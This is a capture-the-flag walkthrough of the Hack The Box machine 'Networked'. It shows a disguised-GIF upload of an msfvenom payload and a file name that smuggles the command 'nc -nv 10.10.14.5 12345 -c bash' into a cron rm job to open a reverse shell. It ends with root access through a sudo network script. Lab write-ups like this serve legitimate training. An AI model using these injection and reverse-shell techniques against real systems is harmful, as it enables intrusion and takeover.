Networked — HTB Walkthrough

ENUMERATION

Nmap Scan

80 HTTP Enumeration

Viewing root page of website and source code we get hint there can be folders upload and gallery but aren’t linked

Gobuster scan

root@kali:~#gobuster dir -w /usr/share/dirbuster/wordlists/directory-lists-2.3-medium.txt -x php,txt,js,html -u http://10.10.10.146

Revealed — — backup and upload with response code 301

We see backup.tar file on website. Lets get it on our machine, directly download or wget http://10.10.10.146/backup/backup.tar

Now viewing index.php on browser gives

The index page is displayed thus index.php is index, so let’s do the same with upload and photos

EXPLOITATION

To upload the file we can capture the burp request

make changes as follows and make it a GIF. You can see GIF is supported type in upload.php code we got from archived backup.tar file

The payload used above is created by using msfvenom.

On photos.php

Now use exploit/multi/handler and set LHOST and LPORT accordingly, and open File

Link you can find in source -code of webiste

Go to this link and shell pops up

GETTING USER

Going to /home/guly I see

checking cronjob for user gave a file check_attack running by user guly

Checking contents of file we see nohup is running

Nohup, short for no hang up is a command in Linux systems that keep processes running even after exiting the shell or terminal. Nohup prevents the processes or jobs from receiving the SIGHUP (Signal Hang UP) signal.

https://www.google.com/search?client=firefox-b-d&q=nohup+command

What does this script do ??So this script is makes use of nohup and removes files on $path$value by sending their contents to /dev/null i.e. nullify

The path used is /var/www/html/uploads and value is any file != index.html

What if we create a file name , that terminates this command and gives reverse shell.

Example : file name = “; nc -nv 10.10.14.5 12345 -c bash”

Now the command goes as follows

Nohup /bin/rm -f /var/www/html/uploads/ ; nc -nv 10.10.14.5 12345 -c bash > /dev/null 2&>1 &

Now what this does is, start no hangup command , removes a file from path /var/www/html/uploads, but receives an end of command interrupt ‘;’ , backgrounds the running process and executes further command i.e. nc -nv 10.10.14.5 12345 and gives shell.

On netcat we see reverse shell

PRIVILEGE ESCALATION

On enumerating sudo privileges on Guly I see

There is a script changename.sh running as sudo without password as root.

Let’s check the script

On running script I see this

So we see this is kind of network script. First I tried to exploit ifup by setting fake path , and reverse shell command in ifup. But since our script doesn’t reach till there I searched for

What I entered was something like this

Please see I was first copy pasting the whole command , but simply entering <anynamelikeNETWORK /bin/sh> worked. We see we are root now.

We can now get root.txt from /root/root.txt

ROOTED!!!